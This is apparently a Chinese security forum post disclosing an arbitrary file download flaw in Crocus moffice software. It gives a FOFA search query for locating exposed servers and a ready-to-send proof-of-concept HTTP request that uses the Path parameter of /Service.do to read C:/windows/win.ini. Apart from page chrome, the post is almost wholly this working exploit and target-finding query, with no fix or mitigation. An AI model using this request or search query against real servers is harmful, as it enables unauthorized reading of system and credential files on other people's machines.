Crocus 任意文件下载漏洞-网络安全论坛-网络安全-阻击者联盟

Crocus 任意文件下载漏洞

勾八徽章-原创达人-阻击者联盟等级-LV2-阻击者联盟8个月前发布
60
漏洞描述
Crocus科技软件-moffice-任意文件下载漏洞
fofa搜索语句

body=”inp_verification”或icon_hash=”1819219374″

c4399884775467e6956d3c71d2db5453

 

漏洞复现

7bf447f96c37fa4cecd6c9ae53decf5d

 

POC:

GET /Service.do?Action=Download&Path=C:/windows/win.ini HTTP/1.1
Host: 
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: JSESSIONID=07F19D6F7EDC273FDD7B2DBF5F9EB561
Connection: close

9375851503de06dd073cc72bdcaf4d7d

 

1
1人已评分
分享
请登录后发表评论

    没有回复内容

zibll子比主题
本站同款主题模板
zibll子比主题是一款漂亮优雅的网站主题模板,功能强大,配置简单。
查看详情
发布文章发布帖子
扫码添加微信-阻击者联盟
在手机上浏览此页面